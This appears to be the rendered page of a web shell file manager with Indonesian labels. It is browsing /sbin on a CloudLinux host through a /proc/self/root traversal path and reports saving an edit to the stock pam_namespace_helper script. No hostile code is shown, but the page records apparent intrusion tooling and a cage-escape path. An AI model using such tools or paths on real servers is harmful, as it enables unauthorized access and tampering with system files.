PATH: //proc/self/root/proc/thread-self/root/sbin
FILE_BARU
CREATE
FOLDER_BARU
MKDIR
UPLOAD_FILE
GO
[ .. KEMBALI ]
📄 cagefs_enter_site
↓
X
📄 cagefsctl-user
↓
X
📄 chroot
↓
X
📄 cloudlinux-selector
↓
X
📄 consoletype
↓
X
📄 cracklib-check
↓
X
📄 cracklib-format
↓
X
📄 cracklib-packer
↓
X
📄 cracklib-unpacker
↓
X
📄 create-cracklib-dict
↓
X
📄 ddns-confgen
↓
X
📄 exim
↓
X
📄 faillock
↓
X
📄 ip
↓
X
📄 ldconfig
↓
X
📄 lvdctl
↓
X
📄 mkhomedir_helper
↓
X
📄 named-checkzone
↓
X
📄 named-compilezone
↓
X
📄 named-nzd2nzf
↓
X
📄 nsec3hash
↓
X
📄 pam_console_apply
↓
X
📄 pam_namespace_helper
↓
X
📄 pam_timestamp_check
↓
X
📄 pluginviewer
↓
X
📄 proxyexec
↓
X
📄 pwhistory_helper
↓
X
📄 saslauthd
↓
X
📄 sasldblistusers2
↓
X
📄 saslpasswd2
↓
X
📄 sendmail
↓
X
📄 snmpd
↓
X
📄 snmptrapd
↓
X
📄 testsaslauthd
↓
X
📄 tmpwatch
↓
X
📄 tsig-keygen
↓
X
📄 unix_chkpwd
↓
X
📄 unix_update
↓
X
SAVING...
BERHASIL DIUBAH!
EDITING: pam_namespace_helper
#!/usr/bin/sh CONF=/etc/security/namespace.conf # Match logic of process_line(), except lines with $HOME are ignored # skip the leading white space, rip off the comments, ignore empty lines sed -e 's/^[ ]*//g' -e 's/#.*//g' -e '/.*\$HOME.*/d' -e '/^$/d' < $CONF | \ while read polydir instance_prefix method uids; do if [ ! -e "$instance_prefix" ]; then echo "mkdir $instance_prefix" mkdir --parents --mode=0 -Z "$instance_prefix" fi done exit 0
SIMPAN PERUBAHAN